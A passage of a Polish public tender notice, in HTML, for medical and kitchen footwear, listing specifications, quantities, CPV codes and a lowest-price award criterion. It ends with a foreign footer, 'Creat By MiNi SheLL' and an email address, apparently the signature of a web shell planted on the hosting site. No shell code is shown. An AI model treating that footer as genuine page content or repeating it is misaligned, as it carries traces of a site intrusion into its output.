d) z profilem ortopedycznym; 
e) wewnętrzna skórzana wkładka; 
f) możliwość regulacji tęgości; 
g)w rozmiarach od 35- 43;	1150 par
2.	Obuwie profilaktyczne męskie palce kryte:
a) obuwie skórzane, skóra barwiona na biało - dziurkowana; 
b) palce kryte; 
c) spody z tworzywa antypoślizgowego;
d) pasek z regulacją na pięcie; 
e) ergonomiczne wkładki; 
f) wewnętrzna skórzana wkładka;
g) w rozmiarach od 39- 46;	160 par
3.	Obuwie damskie dla pracowników kuchni: 
a) palce kryte; 
b) podeszwy antypoślizgowego; 
c) biały kolor obuwia; 
d) możliwość prania w temperaturze 40° C;
e) zapobieganie rozwoju drobnoustrojów i grzybów w obuwiu;
f) w rozmiarach od 35- 44;
g) muszą spełniać wymagania systemu HACCP;	28 par
4.	Drewniaki męskie:
a) pokrycie skórzane, skóra barwiona na biało; 
b) spody wyprofilowane, drewniane, antypoślizgowe; 
c) w rozmiarach od 39- 46;	2 par
Warunki pakowania towaru:
Towar pakowany z podziałem na obuwie damskie i męskie. W opakowaniu rozmiar i ilość zgodnie z załącznikiem do umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Obuwie operacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Rodzaj artykułu	Ilość na 12 miesięcy
1.	Obuwie operacyjne:
a) kolor  zielony; 
b) z możliwością sterylizacji w autoklawach w temperaturze do 135° C i prania w temperaturze  90° C; 
c) o własnościach antystatycznych; 
d) podeszwy antypoślizgowe i absorbujące energię w okolicy piętowej,
anatomicznie dostosowane do stopy; 
e) po bokach otwory wentylacyjne; 
f) w rozmiarze od 35- 46;	30par
Warunki pakowania towaru:
 W jednym opakowaniu rozmiar i ilość zgodnie z załącznikiem do umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com